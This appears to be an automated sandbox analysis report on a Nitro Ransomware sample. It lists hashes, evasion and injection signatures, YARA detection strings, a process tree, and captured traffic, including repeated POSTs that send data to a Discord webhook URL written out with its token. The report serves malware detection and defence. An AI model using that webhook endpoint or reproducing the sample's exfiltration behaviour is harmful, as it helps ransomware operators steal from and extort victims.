
Windows Analysis Report
12057ad2.exe

Overview

General Information

Sample Name: 12057ad2.exe
Analysis ID: 709270
MD5: 716bf12f1b7b6b04f1acf6f8ae1eb4bb
SHA1: c172a657fd1a8759beccff5b144f1cb20033008a
SHA256: 9e801ce8af98b3c03423f3f9b3d9b2f36aad15a63f21523210a9517f12057ad2
Tags: exe, Ransomware

Detection

NitroRansomware
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected Nitro Ransomware
Machine Learning detection for sample
May check the online IP address of the machine
Machine Learning detection for dropped file
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • 12057ad2.exe (PID: 4920 cmdline: "C:\Users\user\Desktop\12057ad2.exe" MD5: 716BF12F1B7B6B04F1ACF6F8AE1EB4BB)
    • cmd.exe (PID: 4572 cmdline: cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 1308 cmdline: wmic csproduct get uuid MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
  • 12057ad2.exe (PID: 4788 cmdline: "C:\Users\user\AppData\Local\Temp\12057ad2.exe" MD5: 716BF12F1B7B6B04F1ACF6F8AE1EB4BB)
  • 12057ad2.exe (PID: 2612 cmdline: "C:\Users\user\AppData\Local\Temp\12057ad2.exe" MD5: 716BF12F1B7B6B04F1ACF6F8AE1EB4BB)
  • cleanup
No configs have been found
Source: 12057ad2.exe | Rule: MALWARE_Win_Nitro | Description: Detects Nitro Ransomware | Author: ditekSHen | Strings:
  • 0x5394:$x1: .givemenitro
  • 0x5889:$x1: .givemenitro
  • 0x5676:$x2: Nitro Ransomware
  • 0xed54:$x3: \NitroRansomware.pdb
  • 0x4390:$x4: NitroRansomware
  • 0x4648:$x4: NitroRansomware
  • 0x475c:$x4: NitroRansomware
  • 0x4d13:$x4: NitroRansomware
  • 0x4d33:$x4: NitroRansomware
  • 0x4d88:$x4: NitroRansomware
  • 0x67aa:$x4: NitroRansomware
  • 0x6dc5:$x4: NitroRansomware
  • 0xed3b:$x4: NitroRansomware
  • 0xed55:$x4: NitroRansomware
  • 0xefd4:$x4: NitroRansomware
  • 0xf044:$x4: NitroRansomware
  • 0xf108:$x4: NitroRansomware
  • 0xf150:$x4: NitroRansomware
  • 0x596b:$s1: Valid nitro code was received
  • 0x5b23:$s2: Discord nitro
  • 0x5cd7:$s2: Discord Nitro
Source: 12057ad2.exe | Rule: RAN_Nitro_Aug_2021_1 | Description: Detect Nitro ransomware | Author: Arkbird_SOLG | Strings:
  • 0x286d:$s1: 1F 1A 28 88 00 00 0A 0A 06 72 4B 14 00 70 28 15 00 00 0A 80 32 00 00 04 28 39 00 00 06 7E 32 00 00 04 6F BB 00 00 0A 00 7E 2F 00 00 04 16 7E 32 00 00 04 7E 30 00 00 04 7E 31 00 00 04 60 28 2F ...
  • 0x1ff9:$s2: 02 7B 24 00 00 04 72 DF 00 00 70 28 1B 00 00
  • 0x202d:$s2: 02 7B 24 00 00 04 72 DF 00 00 70 28 1B 00 00
  • 0x1bbd:$s3: 1F 1A 28 88 00 00 0A 0A 1F 1C 28 88 00 00 0A 0B 7E 21 00 00 04 06 72 70 0C 00 70 28 15 00 00 0A 6F 16 00 00 0A 00 7E 21 00
  • 0x26f9:$s4: 7E 4E 00 00 0A 0A 00 72 B3 13 00 70 73 42 00 00 06 0B 00 07 72 C3 13 00 70 6F 44 00 00 06 0C 08 17 8D 7F 00 00 01 25 16 1F 0A 9D 6F B6 00 00 0A 1C 9A 0A 00 DE 0B 07 2C 07 07 6F 42 00 00 0A
  • 0x27c5:$s5: 7E 4E 00 00 0A 0A 00 73 9A 00 00 0A 0B 00 07 72 1F 14 00 70 6F 9C 00 00 0A 0C 08 6F 9D 00 00 0A 6F B8 00 00 0A 6F B9 00 00 0A 0D 09 6F BA 00 00 0A 0A
Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Rule: MALWARE_Win_Nitro | Description: Detects Nitro Ransomware | Author: ditekSHen | Strings:
  • 0x5394:$x1: .givemenitro
  • 0x5889:$x1: .givemenitro
  • 0x5676:$x2: Nitro Ransomware
  • 0xed54:$x3: \NitroRansomware.pdb
  • 0x4390:$x4: NitroRansomware
  • 0x4648:$x4: NitroRansomware
  • 0x475c:$x4: NitroRansomware
  • 0x4d13:$x4: NitroRansomware
  • 0x4d33:$x4: NitroRansomware
  • 0x4d88:$x4: NitroRansomware
  • 0x67aa:$x4: NitroRansomware
  • 0x6dc5:$x4: NitroRansomware
  • 0xed3b:$x4: NitroRansomware
  • 0xed55:$x4: NitroRansomware
  • 0xefd4:$x4: NitroRansomware
  • 0xf044:$x4: NitroRansomware
  • 0xf108:$x4: NitroRansomware
  • 0xf150:$x4: NitroRansomware
  • 0x596b:$s1: Valid nitro code was received
  • 0x5b23:$s2: Discord nitro
  • 0x5cd7:$s2: Discord Nitro
Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Rule: RAN_Nitro_Aug_2021_1 | Description: Detect Nitro ransomware | Author: Arkbird_SOLG | Strings:
  • 0x286d:$s1: 1F 1A 28 88 00 00 0A 0A 06 72 4B 14 00 70 28 15 00 00 0A 80 32 00 00 04 28 39 00 00 06 7E 32 00 00 04 6F BB 00 00 0A 00 7E 2F 00 00 04 16 7E 32 00 00 04 7E 30 00 00 04 7E 31 00 00 04 60 28 2F ...
  • 0x1ff9:$s2: 02 7B 24 00 00 04 72 DF 00 00 70 28 1B 00 00
  • 0x202d:$s2: 02 7B 24 00 00 04 72 DF 00 00 70 28 1B 00 00
  • 0x1bbd:$s3: 1F 1A 28 88 00 00 0A 0A 1F 1C 28 88 00 00 0A 0B 7E 21 00 00 04 06 72 70 0C 00 70 28 15 00 00 0A 6F 16 00 00 0A 00 7E 21 00
  • 0x26f9:$s4: 7E 4E 00 00 0A 0A 00 72 B3 13 00 70 73 42 00 00 06 0B 00 07 72 C3 13 00 70 6F 44 00 00 06 0C 08 17 8D 7F 00 00 01 25 16 1F 0A 9D 6F B6 00 00 0A 1C 9A 0A 00 DE 0B 07 2C 07 07 6F 42 00 00 0A
  • 0x27c5:$s5: 7E 4E 00 00 0A 0A 00 73 9A 00 00 0A 0B 00 07 72 1F 14 00 70 6F 9C 00 00 0A 0C 08 6F 9D 00 00 0A 6F B8 00 00 0A 6F B9 00 00 0A 0D 09 6F BA 00 00 0A 0A
Source: 00000004.00000002.572902920.000000000079F000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_NitroRansomware | Description: Yara detected Nitro Ransomware | Author: Joe Security
Source: 00000000.00000003.304957981.000000000149C000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_NitroRansomware | Description: Yara detected Nitro Ransomware | Author: Joe Security
Source: 00000005.00000002.574148014.00000000028C4000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_NitroRansomware | Description: Yara detected Nitro Ransomware | Author: Joe Security
Source: 00000004.00000002.574244055.00000000023C4000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_NitroRansomware | Description: Yara detected Nitro Ransomware | Author: Joe Security
Source: 00000005.00000002.572197724.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_NitroRansomware | Description: Yara detected Nitro Ransomware | Author: Joe Security
Source: 0.0.12057ad2.exe.c60000.0.unpack | Rule: MALWARE_Win_Nitro | Description: Detects Nitro Ransomware | Author: ditekSHen | Strings:
  • 0x5394:$x1: .givemenitro
  • 0x5889:$x1: .givemenitro
  • 0x5676:$x2: Nitro Ransomware
  • 0xed54:$x3: \NitroRansomware.pdb
  • 0x4390:$x4: NitroRansomware
  • 0x4648:$x4: NitroRansomware
  • 0x475c:$x4: NitroRansomware
  • 0x4d13:$x4: NitroRansomware
  • 0x4d33:$x4: NitroRansomware
  • 0x4d88:$x4: NitroRansomware
  • 0x67aa:$x4: NitroRansomware
  • 0x6dc5:$x4: NitroRansomware
  • 0xed3b:$x4: NitroRansomware
  • 0xed55:$x4: NitroRansomware
  • 0xefd4:$x4: NitroRansomware
  • 0xf044:$x4: NitroRansomware
  • 0xf108:$x4: NitroRansomware
  • 0xf150:$x4: NitroRansomware
  • 0x596b:$s1: Valid nitro code was received
  • 0x5b23:$s2: Discord nitro
  • 0x5cd7:$s2: Discord Nitro
Source: 0.0.12057ad2.exe.c60000.0.unpack | Rule: RAN_Nitro_Aug_2021_1 | Description: Detect Nitro ransomware | Author: Arkbird_SOLG | Strings:
  • 0x286d:$s1: 1F 1A 28 88 00 00 0A 0A 06 72 4B 14 00 70 28 15 00 00 0A 80 32 00 00 04 28 39 00 00 06 7E 32 00 00 04 6F BB 00 00 0A 00 7E 2F 00 00 04 16 7E 32 00 00 04 7E 30 00 00 04 7E 31 00 00 04 60 28 2F ...
  • 0x1ff9:$s2: 02 7B 24 00 00 04 72 DF 00 00 70 28 1B 00 00
  • 0x202d:$s2: 02 7B 24 00 00 04 72 DF 00 00 70 28 1B 00 00
  • 0x1bbd:$s3: 1F 1A 28 88 00 00 0A 0A 1F 1C 28 88 00 00 0A 0B 7E 21 00 00 04 06 72 70 0C 00 70 28 15 00 00 0A 6F 16 00 00 0A 00 7E 21 00
  • 0x26f9:$s4: 7E 4E 00 00 0A 0A 00 72 B3 13 00 70 73 42 00 00 06 0B 00 07 72 C3 13 00 70 6F 44 00 00 06 0C 08 17 8D 7F 00 00 01 25 16 1F 0A 9D 6F B6 00 00 0A 1C 9A 0A 00 DE 0B 07 2C 07 07 6F 42 00 00 0A
  • 0x27c5:$s5: 7E 4E 00 00 0A 0A 00 73 9A 00 00 0A 0B 00 07 72 1F 14 00 70 6F 9C 00 00 0A 0C 08 6F 9D 00 00 0A 6F B8 00 00 0A 6F B9 00 00 0A 0D 09 6F BA 00 00 0A 0A
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: 12057ad2.exe | ReversingLabs: Detection: 92%
Source: 12057ad2.exe | Virustotal: Detection: 61%
Source: 12057ad2.exe | Metadefender: Detection: 54%
Source: 12057ad2.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Avira: detection malicious, Label: HEUR/AGEN.1232324
Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Metadefender: Detection: 54%
Source: 12057ad2.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 54.91.59.199:443 -> 192.168.2.4:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49700 version: TLS 1.2
Source: 12057ad2.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\asbib\Desktop\Nitro-Ransomware-master\NitroRansomware\obj\Debug\NitroRansomware.pdb | source: 12057ad2.exe, 12057ad2.exe.0.dr

Networking

Source: C:\Users\user\Desktop\12057ad2.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\12057ad2.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\12057ad2.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\12057ad2.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\12057ad2.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\12057ad2.exe | DNS query: name: api.ipify.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: api.ipify.org; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: canary.discord.com; Content-Length: 291; Expect: 100-continue; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: canary.discord.com; Content-Length: 145; Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: canary.discord.com; Content-Length: 133; Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: canary.discord.com; Content-Length: 147; Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: canary.discord.com; Content-Length: 196; Expect: 100-continue; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 54.91.59.199
Source: Joe Sandbox View | IP Address: 54.91.59.199
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: 12057ad2.exe, 00000000.00000002.579820398.000000000348D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://canary.discord.com
Source: 12057ad2.exe, 00000000.00000002.574008966.00000000014F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: 12057ad2.exe, 00000000.00000002.574630053.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: 12057ad2.exe, 12057ad2.exe.0.dr | String found in binary or memory: https://api.ipify.org
Source: 12057ad2.exe, 00000000.00000002.579820398.000000000348D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://canary.discord.com
Source: 12057ad2.exe, 12057ad2.exe.0.dr | String found in binary or memory: https://canary.discord.com/api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD
Source: 12057ad2.exe, 00000000.00000002.579820398.000000000348D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://canary.discord.com4zkd
Source: 12057ad2.exe, 12057ad2.exe.0.dr | String found in binary or memory: https://discord.com/api/v8/entitlements/gift-codes/
Source: 12057ad2.exe, 12057ad2.exe.0.dr | String found in binary or memory: https://i.ibb.co/0frTD92/discord-avatar-512.png
Source: unknown | HTTP traffic detected: POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: canary.discord.com; Content-Length: 291; Expect: 100-continue; Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.ipify.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: api.ipify.org; Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 54.91.59.199:443 -> 192.168.2.4:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49700 version: TLS 1.2
Source: 12057ad2.exe, 00000000.00000002.573245746.000000000142A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: 00000004.00000002.572902920.000000000079F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.304957981.000000000149C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.574148014.00000000028C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.574244055.00000000023C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.572197724.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.303846489.0000000000C62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 12057ad2.exe PID: 4920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 12057ad2.exe PID: 4788, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 12057ad2.exe PID: 2612, type: MEMORYSTR

System Summary

            Source: 12057ad2.exe, type: SAMPLEMatched rule: Detects Nitro Ransomware Author: ditekSHen
            Source: 12057ad2.exe, type: SAMPLEMatched rule: Detect Nitro ransomware Author: Arkbird_SOLG
            Source: 0.0.12057ad2.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects Nitro Ransomware Author: ditekSHen
            Source: 0.0.12057ad2.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detect Nitro ransomware Author: Arkbird_SOLG
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, type: DROPPEDMatched rule: Detects Nitro Ransomware Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, type: DROPPEDMatched rule: Detect Nitro ransomware Author: Arkbird_SOLG
            Source: 12057ad2.exe, type: SAMPLEMatched rule: MALWARE_Win_Nitro author = ditekSHen, description = Detects Nitro Ransomware
            Source: 12057ad2.exe, type: SAMPLEMatched rule: RAN_Nitro_Aug_2021_1 date = 2021-08-12, hash5 = dbed3399932fabe6f7f863403279ac9a6b075aa307dd445df2c7060157d3063b, hash4 = d8e9561612c6e06160d79abde41c7b66e4921a1c041ad5c2658d43050b4fd2d0, hash3 = 89dbea1e4b387325f21c784dc72fcf52599f69e1ded27d1b830ff57ae4831559, hash2 = 6546f0638160cb590b4ead2401fb55d48e10b2ee1808ff0354fff52c9e2f62bf, hash1 = 1194aebc9a0016084f6966b07a171e4c62ce1b21580d177a876873641692ee13, author = Arkbird_SOLG, description = Detect Nitro ransomware, adversary = -, reference = https://bazaar.abuse.ch/browse/tag/NitroRansomware/, tlp = white
            Source: 0.0.12057ad2.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitro author = ditekSHen, description = Detects Nitro Ransomware
            Source: 0.0.12057ad2.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: RAN_Nitro_Aug_2021_1 date = 2021-08-12, hash5 = dbed3399932fabe6f7f863403279ac9a6b075aa307dd445df2c7060157d3063b, hash4 = d8e9561612c6e06160d79abde41c7b66e4921a1c041ad5c2658d43050b4fd2d0, hash3 = 89dbea1e4b387325f21c784dc72fcf52599f69e1ded27d1b830ff57ae4831559, hash2 = 6546f0638160cb590b4ead2401fb55d48e10b2ee1808ff0354fff52c9e2f62bf, hash1 = 1194aebc9a0016084f6966b07a171e4c62ce1b21580d177a876873641692ee13, author = Arkbird_SOLG, description = Detect Nitro ransomware, adversary = -, reference = https://bazaar.abuse.ch/browse/tag/NitroRansomware/, tlp = white
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, type: DROPPEDMatched rule: MALWARE_Win_Nitro author = ditekSHen, description = Detects Nitro Ransomware
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, type: DROPPEDMatched rule: RAN_Nitro_Aug_2021_1 date = 2021-08-12, hash5 = dbed3399932fabe6f7f863403279ac9a6b075aa307dd445df2c7060157d3063b, hash4 = d8e9561612c6e06160d79abde41c7b66e4921a1c041ad5c2658d43050b4fd2d0, hash3 = 89dbea1e4b387325f21c784dc72fcf52599f69e1ded27d1b830ff57ae4831559, hash2 = 6546f0638160cb590b4ead2401fb55d48e10b2ee1808ff0354fff52c9e2f62bf, hash1 = 1194aebc9a0016084f6966b07a171e4c62ce1b21580d177a876873641692ee13, author = Arkbird_SOLG, description = Detect Nitro ransomware, adversary = -, reference = https://bazaar.abuse.ch/browse/tag/NitroRansomware/, tlp = white
            Source: C:\Users\user\Desktop\12057ad2.exeCode function: 0_2_012A62200_2_012A6220
            Source: C:\Users\user\Desktop\12057ad2.exeCode function: 0_2_012A4CC70_2_012A4CC7
            Source: C:\Users\user\Desktop\12057ad2.exeCode function: 0_2_012A62100_2_012A6210
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_009DD38C4_2_009DD38C
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_009DD3804_2_009DD380
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_009DF8514_2_009DF851
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_009DB9244_2_009DB924
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_009DDDF04_2_009DDDF0
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_009DDE004_2_009DDE00
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06AC55084_2_06AC5508
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06AC42E44_2_06AC42E4
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CE0B204_2_06CE0B20
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CE39804_2_06CE3980
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CE99B04_2_06CE99B0
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CEA6E04_2_06CEA6E0
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CEABA84_2_06CEABA8
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CE99A14_2_06CE99A1
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_00DFD38C5_2_00DFD38C
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_00DFF8515_2_00DFF851
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_00DFB9245_2_00DFB924
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_00DFDDF05_2_00DFDDF0
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_00DFDE005_2_00DFDE00
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_06B255085_2_06B25508
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_06B242E45_2_06B242E4
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_0808A2185_2_0808A218
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_080805985_2_08080598
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_0808A2085_2_0808A208
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_0808B4105_2_0808B410
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_0808AF485_2_0808AF48
            Source: C:\Users\user\Desktop\12057ad2.exeProcess Stats: CPU usage > 98%
            Source: 12057ad2.exe, 00000000.00000002.573245746.000000000142A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 12057ad2.exe
            Source: 12057ad2.exe, 00000000.00000003.304957981.000000000149C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNitroRansomware.exe@ vs 12057ad2.exe
